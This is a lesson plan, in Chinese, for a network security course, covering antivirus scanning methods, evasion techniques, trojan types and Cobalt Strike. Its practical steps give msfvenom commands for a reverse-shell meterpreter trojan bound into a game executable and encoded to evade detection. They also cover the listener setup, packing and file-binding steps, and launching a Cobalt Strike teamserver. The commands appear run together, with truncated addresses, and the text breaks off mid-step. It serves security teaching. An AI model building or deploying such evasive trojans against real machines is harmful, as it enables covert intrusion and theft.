《網(wǎng)絡(luò)安全技術(shù)實(shí)踐教程》教案授課單位：授課時(shí)間：授課班級(jí)：授課教師：年月日教案8（第8號(hào)/17號(hào)）課程名稱網(wǎng)絡(luò)安全授課日期、節(jié)次班級(jí)課堂類型理論+實(shí)踐地點(diǎn)章節(jié)（任務(wù)）名稱任務(wù)4.1病毒免殺任務(wù)4.2木馬教學(xué)目標(biāo)知識(shí)目標(biāo)1.理解病毒、木馬等惡意軟件的基本概念及其對(duì)信息系統(tǒng)的危害。2.掌握常見的病毒查殺技術(shù)原理，包括文件掃描、內(nèi)存掃描、行為監(jiān)控和云端查殺等方法。3.熟悉不同病毒掃描技術(shù)（如字符串掃描、通配符掃描、智能掃描、骨架掃描等）的具體應(yīng)用場景及其優(yōu)缺點(diǎn)。能力目標(biāo)1.能夠根據(jù)不同病毒特征選擇合適的查殺技術(shù)并進(jìn)行有效檢測與防護(hù)。2.能分析常見病毒免殺手段，并提出針對(duì)性的防護(hù)與應(yīng)對(duì)措施。3.能在實(shí)際工作中部署、配置并優(yōu)化殺毒軟件，定期更新病毒庫，提升系統(tǒng)安全防護(hù)能力。4.能夠生成并部署木馬程序，模擬真實(shí)攻擊環(huán)境。素質(zhì)目標(biāo)1.樹立主動(dòng)防御意識(shí)，認(rèn)識(shí)到持續(xù)監(jiān)測和病毒防護(hù)在信息安全中的重要性。2.培養(yǎng)細(xì)致嚴(yán)謹(jǐn)?shù)墓ぷ鲬B(tài)度，能在日常運(yùn)維中堅(jiān)持執(zhí)行病毒查殺與防護(hù)規(guī)范。學(xué)情分析授課對(duì)象：計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)專業(yè)學(xué)生，包括中職與普高混合班。學(xué)生特點(diǎn)：計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)專業(yè)學(xué)生，基礎(chǔ)知識(shí)存在差異，需針對(duì)性講解與實(shí)踐操作結(jié)合。學(xué)習(xí)習(xí)慣：偏愛實(shí)踐性強(qiáng)的課程，理論學(xué)習(xí)興趣較低。樂于通過案例和互動(dòng)式教學(xué)理解知識(shí)點(diǎn)。重難點(diǎn)分析教學(xué)重點(diǎn)1.病毒查殺技術(shù)的基本原理，包括文件掃描、內(nèi)存掃描、行為監(jiān)控和云端查殺的具體過程。2.常見病毒掃描技術(shù)（字符串掃描、通配符掃描、智能掃描、骨架掃描等）的工作機(jī)制及應(yīng)用。3.CobaltStrike監(jiān)聽器配置與木馬生成過程教學(xué)難點(diǎn)1.病毒免殺技術(shù)的實(shí)現(xiàn)原理（如殼技術(shù)、加密、混淆、特征隱藏等），及其對(duì)傳統(tǒng)查殺手段的挑戰(zhàn)。2.查殺技術(shù)中智能掃描與骨架掃描方法的深入理解及實(shí)際應(yīng)用分析。3.病毒行為監(jiān)控與傳統(tǒng)特征碼掃描之間的關(guān)系與互補(bǔ)性分析。信息化應(yīng)用方法通過課件、視頻、案例分析、互動(dòng)提問等多種信息化方式，借助學(xué)習(xí)通平臺(tái)發(fā)布學(xué)習(xí)資源和任務(wù)，學(xué)生自主學(xué)習(xí)并完成任務(wù)。課程思政元素1.網(wǎng)絡(luò)安全事關(guān)國家安全，培養(yǎng)學(xué)生的家國情懷與責(zé)任感。2.樹立服務(wù)意識(shí)，塑造職業(yè)精神，使學(xué)生形成運(yùn)用所學(xué)專業(yè)知識(shí)為社會(huì)貢獻(xiàn)的責(zé)任感。3.鍛煉學(xué)生實(shí)事求是的工作態(tài)度，培養(yǎng)學(xué)生嚴(yán)謹(jǐn)細(xì)致的工作作風(fēng)、精益求精的工匠精神。教學(xué)實(shí)施過程課前：平臺(tái)發(fā)布病毒與木馬的認(rèn)知與防護(hù)任務(wù)1學(xué)習(xí)任務(wù)，學(xué)生預(yù)習(xí)。課中：導(dǎo)入新課某公司突然發(fā)現(xiàn)其內(nèi)部網(wǎng)絡(luò)頻繁出現(xiàn)異常，數(shù)據(jù)傳輸速率異常緩慢，部分敏感文件似乎遭到未授權(quán)訪問。眾智科技接到該公司委托后立即成立專項(xiàng)應(yīng)急小組，對(duì)相關(guān)流量進(jìn)行分析，初步懷疑，這些情況可能由一種新型病毒所導(dǎo)致。該病毒以隱藏自身蹤跡見長，能夠悄無聲息地在企業(yè)網(wǎng)絡(luò)中橫向擴(kuò)散，竊取重要信息，并可能對(duì)關(guān)鍵系統(tǒng)構(gòu)成威脅。經(jīng)過專項(xiàng)應(yīng)急小組緊急處理后，公司的網(wǎng)絡(luò)恢復(fù)了正常。眾智科技深知病毒木馬可能對(duì)客戶信息系統(tǒng)帶來嚴(yán)重威脅，通過為客戶網(wǎng)絡(luò)維護(hù)部門講解和演示病毒免殺，使客戶網(wǎng)絡(luò)維護(hù)部門了解了病毒如何逃避殺毒軟件的查殺。因此，在接下來的日常系統(tǒng)安全管理過程中，殺毒軟件的安裝及定期升級(jí)病毒庫成為客戶網(wǎng)絡(luò)維護(hù)部門日常信息安全維護(hù)的必要工作之一。任務(wù)一知識(shí)點(diǎn)講解一.病毒查殺方式及原理從計(jì)算機(jī)科學(xué)角度來看，病毒是一種惡意軟件，它能在未經(jīng)授權(quán)的情況下傳播、感染計(jì)算機(jī)系統(tǒng)，并對(duì)系統(tǒng)功能進(jìn)行破壞，竊取數(shù)據(jù)，或者進(jìn)行其他非法操作。病毒查殺是指通過殺毒軟件或其他安全工具檢測、識(shí)別并清除計(jì)算機(jī)系統(tǒng)中的病毒、木馬及其他惡意軟件的過程。這一過程通常基于以下幾種技術(shù)。1．基于文件掃描的反病毒技術(shù)（1）第一代掃描技術(shù)第一代掃描技術(shù)的核心是在文件中檢索病毒特征序列。該技術(shù)雖然出現(xiàn)得比較早，但是直到現(xiàn)在仍然被多家殺毒廠商所使用，其主要代表為“字符串掃描技術(shù)”和“通配符掃描技術(shù)”。字符串掃描技術(shù)：使用從病毒中提取出來的具有一定特征的一段字符（特征碼）來檢測病毒，該段字符在一般程序中不太可能出現(xiàn)。例如，一個(gè)隱藏執(zhí)行格式化所有硬盤的命令不太可能出現(xiàn)在一般程序中，可以將其作為特征碼。通配符掃描技術(shù)：由于字符串掃描技術(shù)有執(zhí)行速度與特征碼長度的限制，所以正在逐漸被通配符掃描技術(shù)取代。當(dāng)前反病毒軟件中的簡單掃描器通常支持通配符。掃描器中的通配符一般用于跳過某些字節(jié)或字節(jié)范圍，而隨著技術(shù)的發(fā)展，現(xiàn)在大多數(shù)掃描器已經(jīng)支持正則表達(dá)式。（2）第二代掃描技術(shù)第二代掃描技術(shù)以“近似精確識(shí)別法”和“精確識(shí)別法”為代表，除此之外還有“智能掃描法”與“骨架掃描法”，第二代掃描技術(shù)與第一代掃描技術(shù)相比，對(duì)檢測精度提出了更嚴(yán)格的要求。（1）近似精確識(shí)別法：采用兩個(gè)或更多的字符集來檢測每個(gè)病毒，如果掃描器檢測到其中一個(gè)特征符合，就會(huì)警告發(fā)現(xiàn)病毒變種，但不會(huì)針對(duì)病毒執(zhí)行下一步操作。如果多個(gè)特征碼全部符合，則會(huì)報(bào)警發(fā)現(xiàn)病毒并執(zhí)行下一步操作。（2）精確識(shí)別法：作為最嚴(yán)格的識(shí)別方法之一，精確識(shí)別法確保了對(duì)病毒變種的精準(zhǔn)匹配。它不僅基于傳統(tǒng)的校驗(yàn)和，還可能整合了更復(fù)雜的算法，如全病毒體校驗(yàn)和生成特征圖。這種方法要求對(duì)病毒的每一個(gè)字節(jié)都進(jìn)行精確匹配，盡管這可能導(dǎo)致更高的計(jì)算成本，但它提供了較高級(jí)別的檢測確定性，常與其他掃描技術(shù)結(jié)合使用，以達(dá)到最佳防護(hù)效果。（3）智能掃描法：忽略檢測文件中類似NOP等無意義的指令，而對(duì)于文本格式的腳本病毒和宏病毒，則可以替換多余的格式字符，如空格符、換行符或制表符等。所有的替換動(dòng)作均在掃描緩沖區(qū)中執(zhí)行，大大提高了掃描器的檢測能力。（4）骨架掃描法：由卡巴斯基公司發(fā)明，在檢測宏病毒時(shí)效果特別顯著。該方法沒有使用特征碼和校驗(yàn)和，而是逐行解析宏語句，丟棄所有非必要字符，只保留代碼的骨架，并對(duì)代碼骨架進(jìn)行進(jìn)一步的分析，在一定程度上提高了對(duì)病毒變種的檢測能力。2．基于內(nèi)存掃描的反病毒技術(shù)內(nèi)存掃描器通常與實(shí)時(shí)監(jiān)控系統(tǒng)緊密集成，協(xié)同工作，以提供實(shí)時(shí)保護(hù)。它們能夠在病毒或惡意軟件執(zhí)行前或執(zhí)行過程中及時(shí)發(fā)現(xiàn)并阻止?jié)撛谕{。由于程序加載到內(nèi)存中后，其結(jié)構(gòu)和磁盤上的原始文件結(jié)構(gòu)相比可能會(huì)發(fā)生變化，包括代碼重定位、動(dòng)態(tài)鏈接庫的加載、數(shù)據(jù)段的初始化等，這些變化要求內(nèi)存掃描器采用不同的策略。這意味著內(nèi)存掃描使用的特征碼往往與文件掃描的不同，需要針對(duì)內(nèi)存中代碼的特性定制開發(fā)，以便更有效地識(shí)別已加載或正在執(zhí)行的惡意代碼。內(nèi)存掃描的一個(gè)重要優(yōu)勢在于其能夠即時(shí)響應(yīng)。當(dāng)病毒或惡意軟件嘗試在內(nèi)存中初始化、修改系統(tǒng)設(shè)置、注入其他進(jìn)程或執(zhí)行其他惡意行為時(shí)，內(nèi)存掃描器能夠迅速捕獲這些活動(dòng)，及時(shí)阻止惡意代碼的進(jìn)一步執(zhí)行，從而降低系統(tǒng)被侵害的風(fēng)險(xiǎn)。與靜態(tài)文件掃描相比，內(nèi)存掃描更側(cè)重于動(dòng)態(tài)分析，即在代碼執(zhí)行過程中分析其行為。這種分析能夠揭示更多關(guān)于惡意軟件意圖的信息，比如網(wǎng)絡(luò)連接請(qǐng)求、系統(tǒng)資源的異常訪問模式等，這些都是文件掃描難以直接捕獲的。3．基于行為監(jiān)控的反病毒技術(shù)此類反病毒技術(shù)一般需要和虛擬機(jī)與主動(dòng)防御等技術(shù)配合使用。其核心原理是在受控的虛擬環(huán)境中動(dòng)態(tài)執(zhí)行可疑代碼，同時(shí)運(yùn)用復(fù)雜的算法模型分析程序行為序列，并將其與龐大數(shù)據(jù)庫中的已知惡意行為模式進(jìn)行比對(duì)。4．基于新興技術(shù)的反病毒技術(shù)（1）云端查殺技術(shù)：云端查殺實(shí)踐了“集體智慧，協(xié)同防御”的原則，代表了反病毒領(lǐng)域的一大突破。該技術(shù)依托于強(qiáng)大的服務(wù)器中樞與廣泛分布的用戶終端所形成的網(wǎng)絡(luò)，使服務(wù)器能實(shí)時(shí)監(jiān)測各用戶的狀態(tài)。一旦檢測到個(gè)體異常，其能迅速部署檢查并隔離問題，有效阻止威脅擴(kuò)散。此過程依賴于用戶群體的行為模式作為基線，例如，若多數(shù)設(shè)備已安全運(yùn)行某軟件，則新設(shè)備運(yùn)行該軟件亦被視為安全。反之，則觸發(fā)警報(bào)并介入防護(hù)。（2）信任鏈繼承機(jī)制：構(gòu)建于云端的復(fù)雜信任架構(gòu)，融合用戶反饋、專家分析、自動(dòng)化評(píng)估及數(shù)字簽名驗(yàn)證等多維度信任體系。其核心是“根可信進(jìn)程”，根可信進(jìn)程作為信任鏈的起源點(diǎn)，確保其衍生的子進(jìn)程均被賦予信任。例如，經(jīng)數(shù)字簽名驗(yàn)證的進(jìn)程A執(zhí)行時(shí)無阻，其衍生的子進(jìn)程亦自動(dòng)獲得信任；而未經(jīng)驗(yàn)證的進(jìn)程B，則面臨嚴(yán)格監(jiān)控，其有任何可疑行為都將立即上報(bào)分析，從而持續(xù)拓展云端信任網(wǎng)絡(luò)的深度與廣度。（3）分布式防御協(xié)作：利用云計(jì)算與病毒傳播的分布式特性，實(shí)現(xiàn)對(duì)病毒事件的快速響應(yīng)。每一起新病毒事件，都能迅速被上傳至云端，經(jīng)分析處理后，全網(wǎng)范圍內(nèi)的設(shè)備即時(shí)獲得防護(hù)升級(jí)，大大提升了對(duì)新威脅的捕捉效率和覆蓋面。（4）多引擎聯(lián)合查殺：該技術(shù)通過同時(shí)調(diào)用兩個(gè)或更多反病毒引擎進(jìn)行掃描，顯著提升檢測精度。反病毒解決方案通常允許用戶靈活選擇掃描模式，針對(duì)不同引擎采取策略，這要求免殺技術(shù)需針對(duì)每個(gè)引擎特性逐一突破，增加了惡意軟件逃避檢測的難度。二、病毒免殺技術(shù)免殺技術(shù)是惡意軟件開發(fā)者用來逃避查殺機(jī)制的一系列策略和技術(shù)，從而確保其惡意代碼能夠在受保護(hù)的系統(tǒng)中運(yùn)行而不被發(fā)現(xiàn)或阻止，常見的免殺技術(shù)如下。1．修改特征碼所謂特征碼，就是指防毒軟件從病毒樣本中提取的長度不超過64字節(jié)且能代表病毒特征的十六進(jìn)制代碼，主要有單一特征碼、多重特征碼和復(fù)合特征碼這3種類型。殺毒軟件在工作時(shí)，使用了檢測病毒特征碼的概念，那么惡意軟件開發(fā)者可以通過修改病毒特征碼的方式躲過殺毒軟件的掃描。2．花指令免殺花指令免殺是指通過插入無意義或具有混淆性質(zhì)的代碼片段，即“花指令”，來干擾反匯編過程和反病毒軟件的靜態(tài)分析，從而達(dá)到隱藏惡意代碼真實(shí)邏輯的目的。其主要思想是通過在程序入口點(diǎn)或關(guān)鍵代碼段前插入看似無關(guān)緊要的指令序列，使得反匯編工具難以直接揭示程序的真實(shí)功能，從而增加分析難度。其具體實(shí)現(xiàn)包括利用jmp、call和ret等指令改變程序的執(zhí)行流程，使程序的實(shí)際起始點(diǎn)或重要邏輯分支不易被追蹤，通過復(fù)雜的堆棧指令，如壓棧、彈棧指令，進(jìn)一步擾亂代碼的邏輯路徑，使分析人員難以通過直觀的反匯編代碼理解程序行為；使用計(jì)算和條件轉(zhuǎn)移指令對(duì)關(guān)鍵地址或數(shù)據(jù)進(jìn)行間接引用，使關(guān)鍵代碼的位置和用途更加隱蔽。3．加殼免殺加殼的本質(zhì)是在外部包裹一層代碼，以此來改變軟件的原始面貌，實(shí)現(xiàn)對(duì)軟件的保護(hù)、壓縮或加密。殼就是軟件所增加的保護(hù)，其并不會(huì)破壞軟件內(nèi)部結(jié)構(gòu)。當(dāng)運(yùn)行這個(gè)加殼的程序時(shí)，系統(tǒng)首先會(huì)運(yùn)行程序里的殼，然后由殼將加密的程序逐步還原到內(nèi)存中，最后運(yùn)行程序。加殼雖然對(duì)于特征碼繞過有非常好的效果，基本上可以把特征碼全部掩蓋，但是其缺點(diǎn)也非常明顯，由于殼本身也具有一定的特征，某些反病毒軟件能夠直接識(shí)別出常見的殼類型，從而觸發(fā)警報(bào)。一些專業(yè)的逆向工程師或高級(jí)的反病毒軟件能夠識(shí)別并移除加殼程序的外殼，暴露出其原始代碼。4．內(nèi)存免殺內(nèi)存免殺將惡意代碼（如病毒、木馬等）直接加載到內(nèi)存中，而不將其寫入磁盤上的文件中，從而繞過傳統(tǒng)的基于文件的殺毒軟件檢測。惡意軟件常常利用系統(tǒng)漏洞或合法進(jìn)程，通過動(dòng)態(tài)庫注入、遠(yuǎn)程線程創(chuàng)建等手段，將惡意代碼片段插入正在運(yùn)行的合法應(yīng)用程序中執(zhí)行。在某些高級(jí)策略中，惡意軟件能夠在運(yùn)行時(shí)動(dòng)態(tài)修改自身的代碼結(jié)構(gòu)，采用代碼變形、多態(tài)性技術(shù)等，使得其內(nèi)存中的表示形式隨每次執(zhí)行而變化，這種動(dòng)態(tài)性會(huì)讓基于靜態(tài)特征碼的檢測工具失效。5．二次編譯二次編譯主要用于修改惡意軟件的源代碼，使其在經(jīng)過編譯后能夠躲避殺毒軟件的檢測。這種技術(shù)通常涉及對(duì)源代碼進(jìn)行反匯編、逆向工程和系統(tǒng)漏洞利用等高級(jí)黑客技術(shù)。攻擊者獲取惡意軟件的源代碼后，對(duì)其進(jìn)行修改，改變其特征或行為模式。經(jīng)過修改的源代碼需要被重新編譯成可執(zhí)行文件。編譯完成后，攻擊者會(huì)使用多種殺毒軟件對(duì)生成的可執(zhí)行文件進(jìn)行掃描測試，以驗(yàn)證其是否成功躲避了殺毒軟件的檢測。任務(wù)一實(shí)施步驟1.msf自捆綁加編碼（1）在Metasploit框架下實(shí)現(xiàn)免殺的方式之一是使用msf編碼器，即使用msf編碼器對(duì)制作的木馬進(jìn)行重新編碼，生成一個(gè)二進(jìn)制文件，這個(gè)文件運(yùn)行后，msf編碼器會(huì)將原始程序解碼到內(nèi)存中并執(zhí)行。在Kali終端輸入并執(zhí)行“msfvenom-lencoders”，可以列出所有可用的編碼方式，如圖4-1所示。圖4-1列出所有可用的編碼方式（2）使用msfvenom生成一個(gè)Windows環(huán)境下的木馬，并將其捆綁到wegame.exe（可以選擇任意.exe程序）上，生成名為wegame01.exe的合成馬。同時(shí)，對(duì)木馬進(jìn)行多次x86/shikata_ga_nai編碼以實(shí)現(xiàn)免殺處理。代碼如下。msfvenom-pwindows/meterpreter/reverse_tcplhost=28lport=4444

-ex86/shikata_ga_nai-x/var/tmp/wegame.exe-i12-fexe-o/var/tmp/wegame01.exe注意：在-e選項(xiàng)后可嘗試使用其他編碼方式。選項(xiàng)說明如下。-p：攻擊載荷，用戶載入后滲透模塊Meterpreter反彈Shell。lhost：攻擊機(jī)IP地址。lport：攻擊機(jī)監(jiān)聽端口。-e：指定需要使用的編碼器。-x：指定一個(gè)自定義的可執(zhí)行文件作為模板。-i：指定編碼次數(shù)。-f：指定輸出格式。-o：輸入payload。（3）使用指定方式進(jìn)行監(jiān)聽，輸入代碼如下，效果如圖4-2所示。useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost28setlport4444run圖4-2使用指定方式進(jìn)行監(jiān)聽（4）通過復(fù)制等方式將wegame01.exe文件放入靶機(jī)測試即可。圖4-3所示為運(yùn)行木馬之后的木馬上線效果。圖4-3木馬上線效果2．添加花指令（1）加花是病毒免殺的常用手段，加花以后，一些殺毒軟件就檢測不出病毒了，但是有些功能比較強(qiáng)的殺毒軟件還是能檢測出病毒的。這可以算是免殺技術(shù)中最初級(jí)的階段。使用msf編碼器生成常規(guī)木馬，如圖4-4所示。msfvenom-pwindows/shell_reverse_tcp-ax86--platformwindows

lhost=28lport=4444-fexe-o/var/tmp/abc.exe圖4-4生成常規(guī)木馬（1）使用牧馬游民工具對(duì)生成的abc.exe木馬進(jìn)行加花處理，將剛剛生成的木馬拖進(jìn)程序界面內(nèi)，選擇“花指令”，最后單擊“加花”按鈕即可對(duì)abc.exe添加花指令，如圖4-5所示。圖4-5添加花指令3．UPX加殼（1）軟件加殼也可以稱為軟件加密（或軟件壓縮），只是加密（或壓縮）的方式與正常加密的目的不一樣。這里我們繼續(xù)使用前面步驟中msf編碼器生成的常規(guī)木馬。（2）使用UPXShell進(jìn)行加殼處理。將需要加殼的木馬添加進(jìn)軟件后，單擊“壓縮”選項(xiàng)卡中的“執(zhí)行！”按鈕，即可對(duì)木馬程序進(jìn)行加殼處理，如圖4-6所示。圖4-6UPX加殼4．文件捆綁（1）使用文件捆綁工具進(jìn)行捆綁（文件1為之前生成的木馬程序，文件2為正常程序），如圖4-7所示。（2）完成上一步操作后，打開“捆綁文件”選項(xiàng)卡，單擊“執(zhí)行”按鈕就可以將之前生成的木馬程序與正常程序進(jìn)行捆綁，生成惡意程序，如圖4-8所示。將生成的惡意程序發(fā)送到靶機(jī)運(yùn)行，即可看到靶機(jī)被控制。圖4-7文件捆綁圖4-8生成惡意程序5．Golang編譯捆綁（1）在Golang環(huán)境中安裝該程序go1.21.6.windows-amd64.msi，軟件如圖4-9所示。圖4-9Golang安裝程序（2）軟件安裝完成后，需要配置環(huán)境變量。右擊“我的電腦”，在彈出的快捷菜單中選擇“屬性”，在打開的窗口中單擊“高級(jí)系統(tǒng)設(shè)置”，在彈出的“系統(tǒng)屬性”對(duì)話框中單擊“環(huán)境變量”，在彈出的“環(huán)境變量”對(duì)話框的“系統(tǒng)變量”欄中雙擊“Path”變量，并在彈出的對(duì)話框中增加一條Golang的安裝位置信息，如圖4-10所示。圖4-10配置環(huán)境變量（3）配置完成后需要測試環(huán)境變量是否配置成功，在“命令提示符”窗口中執(zhí)行“goversion”查看軟件版本，如圖4-11所示。圖4-11測試環(huán)境變量是否配置成功（4）使用Golang編譯捆綁程序源代碼，生成“GoFileBinder.exe”。在“命令提示符”窗口中進(jìn)入放置源代碼文件的文件夾，使用“gobuildGoFileBinder.go”命令生成GoFileBinder.exe，如圖4-12所示。圖4-12生成GoFileBinder.exe（5）使用GoFileBinder.exe程序進(jìn)行文件捆綁。注意在此例中“abc.exe”為木馬程序，“putty.exe”為正常程序。在輸入并執(zhí)行GoFileBinder.exeabc.exeputty.exe命令后，在當(dāng)前文件夾中會(huì)生成“Yihsiwei.bat”這個(gè)批處理文件，如圖

4-13所示。圖4-13生成Yihsiwei.bat批處理文件（6）雙擊Yihsiwei.bat批處理文件，批處理會(huì)自動(dòng)生成捆綁后的木馬程序“Yihsiwei.exe”，如圖4-14所示。圖4-14生成捆綁木馬程序（7）接下來依舊使用msf編碼器中的監(jiān)聽模塊以及對(duì)應(yīng)的payload完成上線。將Yihsiwei.exe文件放入靶機(jī)運(yùn)行。圖4-15所示為運(yùn)行木馬之后的木馬上線效果。圖4-15通過Golang編譯捆綁木馬上線效果任務(wù)2知識(shí)點(diǎn)講解一.木馬簡介1．木馬的定義木馬（TrojanHorse），也稱木馬病毒，是指通過特定的程序來控制另一臺(tái)計(jì)算機(jī)系統(tǒng)?！癟rojanHorse”一詞源自古希臘傳說。在這個(gè)傳說中，希臘軍隊(duì)圍攻特洛伊城多年未果，于是設(shè)計(jì)了一個(gè)巨大的木馬雕像，假裝撤退并將木馬雕像遺棄在特洛伊城門外。特洛伊人將木馬雕像視為戰(zhàn)利品帶入城內(nèi)，卻不知其中藏有希臘士兵。夜幕降臨時(shí)，藏匿的希臘士兵悄悄打開城門，城外伏兵涌入，導(dǎo)致特洛伊城淪陷。因此，“TrojanHorse”（或簡稱“Trojan”）后來成為隱秘入侵或內(nèi)部破壞的代名詞，在現(xiàn)代尤其指代那些表面看似無害但實(shí)際上含有惡意代碼的計(jì)算機(jī)程序，即“木馬”。木馬與一般的病毒不同，它不會(huì)自我繁殖，也不會(huì)“刻意”地去感染其他文件，它通過偽裝自身來吸引用戶下載并執(zhí)行，向施種者提供打開被種主機(jī)的門戶，使施種者可以任意毀壞、竊取被種主機(jī)的文件，甚至遠(yuǎn)程操控被種主機(jī)。2．木馬的運(yùn)行原理木馬是一種典型的C/S模式軟件，分為客戶端和服務(wù)器端。一般情況下，黑客需要將服務(wù)器端程序安裝到目標(biāo)主機(jī)上，在自己的計(jì)算機(jī)上運(yùn)行客戶端程序。如果黑客能夠通過木馬成功地控制目標(biāo)主機(jī)，就能在自己的計(jì)算機(jī)與目標(biāo)主機(jī)之間建立起一個(gè)TCP連接。按照連接建立方式的不同，木馬主要分為兩種類型：正向連接木馬和反彈連接木馬。正向連接木馬的特點(diǎn)是目標(biāo)主機(jī)上固定開放某個(gè)端口，然后由黑客主動(dòng)連接目標(biāo)主機(jī)。反彈連接木馬則是在黑客的計(jì)算機(jī)上固定開放某個(gè)端口，然后由目標(biāo)主機(jī)主動(dòng)連接黑客的計(jì)算機(jī)。早期的木馬主要為正向連接木馬，這種木馬的最大缺點(diǎn)是：黑客要想連接目標(biāo)主機(jī)，必須先知道其IP地址。對(duì)于目前采用撥號(hào)上網(wǎng)的終端，IP屬于動(dòng)態(tài)IP。每次撥號(hào)后，終端IP都會(huì)更換用戶每次撥號(hào)后IP地址都會(huì)更換，這樣就算被黑客種了木馬，在目標(biāo)主機(jī)下次撥號(hào)的時(shí)候，黑客也會(huì)因找不到IP而丟失目標(biāo)主機(jī)。此外，對(duì)于目前廣泛采用的另外一種上網(wǎng)方式，即局域網(wǎng)通過NAT（NetworkAddressTranslation，網(wǎng)絡(luò)地址轉(zhuǎn)換）接入互聯(lián)網(wǎng)來說，那些處于內(nèi)網(wǎng)的機(jī)器由于采用了私有IP地址，因而外界是無法直接訪問它們的（即使被種了木馬也沒用），除非黑客與目標(biāo)主機(jī)處于同一個(gè)局域網(wǎng)中，否則無法現(xiàn)其建立連接。由于正向連接木馬存在一系列缺點(diǎn)，所以就產(chǎn)生了反彈連接木馬，灰鴿子正是反彈連接木馬的始祖。反彈連接木馬通過在黑客的計(jì)算機(jī)上開啟固定端口，然后由目標(biāo)主機(jī)主動(dòng)連接黑客的計(jì)算機(jī)，克服了正向連接木馬的一系列缺點(diǎn)，無論目標(biāo)主機(jī)的IP地址如何變換，目標(biāo)主機(jī)都可以主動(dòng)連接到黑客的計(jì)算機(jī)。即使目標(biāo)主機(jī)處于內(nèi)網(wǎng)，由于內(nèi)網(wǎng)的機(jī)器是可以主動(dòng)訪問外網(wǎng)的，所以目標(biāo)主機(jī)也可以連接到黑客的計(jì)算機(jī)。反彈連接木馬的不足在于要求黑客必須有固定的IP地址，否則目標(biāo)主機(jī)將無法找到黑客的計(jì)算機(jī)。解決這個(gè)問題的方法之一是采用動(dòng)態(tài)域名技術(shù)，即黑客注冊(cè)一個(gè)域名，然后將域名對(duì)應(yīng)到自己的IP地址上，這樣，無論黑客的IP地址如何變換，目標(biāo)主機(jī)都可以通過動(dòng)態(tài)域名主動(dòng)連接到黑客的計(jì)算機(jī)。除了要解決動(dòng)態(tài)IP地址的問題以外，反彈連接木馬還有一個(gè)要解決的難題，即如果黑客的計(jì)算機(jī)處于內(nèi)網(wǎng)，那么目標(biāo)主機(jī)仍然是無法主動(dòng)連接它的，這還要求處于內(nèi)網(wǎng)的黑客的計(jì)算機(jī)必須在內(nèi)網(wǎng)的出口路由器上做端口映射。雖然反彈連接木馬配置起來相對(duì)比較麻煩，但是由于其技術(shù)“相對(duì)先進(jìn)”目前的木馬絕大多數(shù)都是反彈連接木馬。二、木馬的常見類型1．遠(yuǎn)程訪問型木馬遠(yuǎn)程控制是現(xiàn)代木馬的基本功能，木馬會(huì)設(shè)法與用戶計(jì)算機(jī)建立連接，隨后通過遠(yuǎn)程下發(fā)命令來實(shí)現(xiàn)遠(yuǎn)程抓取、文件傳輸、屏幕截取等功能。典型代表有灰鴿子、冰河等。2．盜取密碼型木馬這類木馬以找到所有的隱藏密碼為目標(biāo)，如各種社交賬號(hào)和密碼、網(wǎng)絡(luò)游戲中的游戲密碼，并在受害者不知情的情況下將密碼信息發(fā)送出去。典型代表有Wirenet等。3．記錄鍵值型木馬記錄鍵值型木馬顧名思義就是記錄用戶每一次敲擊鍵盤操作的木馬。這類木馬會(huì)隨著操作系統(tǒng)的啟動(dòng)而自動(dòng)加載，分為在線和離線兩種類型，分別記錄用戶在在線和離線兩種狀態(tài)下敲擊鍵盤的信息。記錄鍵值型木馬一般也具有郵件發(fā)送功能，能通過郵件將記錄的信息發(fā)送給控制者。典型代表有MagicLantern、鍵盤記錄器木馬變種EOM等。4．DDoS攻擊型木馬攻擊者通過木馬程序控制被感染的主機(jī)，這些被感染的主機(jī)稱為“目標(biāo)主機(jī)”。攻擊者通過控制大量目標(biāo)主機(jī)發(fā)起DDoS（DistributedDenialofService，分布式拒絕服務(wù)）攻擊。例如，當(dāng)攻擊者針對(duì)某個(gè)網(wǎng)站發(fā)起DDoS攻擊時(shí)，會(huì)導(dǎo)致該網(wǎng)站的服務(wù)器資源被大量占用，無法正常為用戶提供服務(wù)。典型代表有SatanDDoS僵尸網(wǎng)絡(luò)木馬、魔鼬等。5．網(wǎng)銀木馬網(wǎng)銀木馬主要針對(duì)銀行的網(wǎng)上交易系統(tǒng)，該木馬旨在竊取用戶的銀行賬戶信息，包括銀行賬號(hào)和密碼信息，給個(gè)人財(cái)產(chǎn)安全帶來很大的危害。典型代表有TinyBanker、木馬銀行家等。CobaltStrike滲透工具CobaltStrike，這一在滲透測試領(lǐng)域內(nèi)的專業(yè)工具，憑借其卓越的功能與靈活性，已經(jīng)從原先依賴于MetasploitFramework的框架中獨(dú)立出來，發(fā)展為一個(gè)全面且獨(dú)立的操作平臺(tái)。它革命性地采用了C/S架構(gòu)設(shè)計(jì)，其中服務(wù)器端扮演著核心角色，充當(dāng)指揮中樞，負(fù)責(zé)管理和協(xié)調(diào)各種滲透任務(wù)，而客戶端則更加靈活多變，允許安全團(tuán)隊(duì)部署多個(gè)客戶端實(shí)例，以便團(tuán)隊(duì)成員能夠在不同地點(diǎn)進(jìn)行協(xié)同作業(yè)，實(shí)現(xiàn)真正的分布式滲透測試和紅隊(duì)演練。CobaltStrike有以下功能特性。（1）端口轉(zhuǎn)發(fā)與代理：允許攻擊者通過受控主機(jī)在內(nèi)網(wǎng)中進(jìn)行端口轉(zhuǎn)發(fā)，建立隧道穿透網(wǎng)絡(luò)隔離，便于后續(xù)的攻擊操作。（2）病毒與木馬生成：能夠生成多種類型的惡意載荷，包括Windows可執(zhí)行文件、動(dòng)態(tài)鏈接庫、宏病毒文檔、JavaApplet等，用于釣魚攻擊或利用系統(tǒng)漏洞進(jìn)行植入。（3）漏洞利用：集成了一些已知漏洞的利用模塊，幫助攻擊者快速利用目標(biāo)系統(tǒng)的安全弱點(diǎn)。（4）憑據(jù)收集：能夠收集目標(biāo)網(wǎng)絡(luò)中的用戶名和密碼，利用明文憑據(jù)、哈希傳遞或憑證盜取技術(shù)進(jìn)一步滲透網(wǎng)絡(luò)。（5）橫向移動(dòng)：提供了多種技術(shù)，如哈希傳遞等，在內(nèi)網(wǎng)中橫向擴(kuò)散，控制更多的系統(tǒng)。任務(wù)二實(shí)施步驟（1）下載CobaltStrike安裝包，并將CobaltStrike安裝包上傳到Kali中。我們進(jìn)入CobaltStrike相應(yīng)的文件夾中，在終端輸入“./teamserver31admin”并執(zhí)行，運(yùn)行CobaltStrike服務(wù)器端軟件，如圖4-16所示。圖4-16運(yùn)行CobaltStrike服務(wù)器端軟件（2）下面需要運(yùn)行CobaltStrike客戶端軟件，CobaltStrik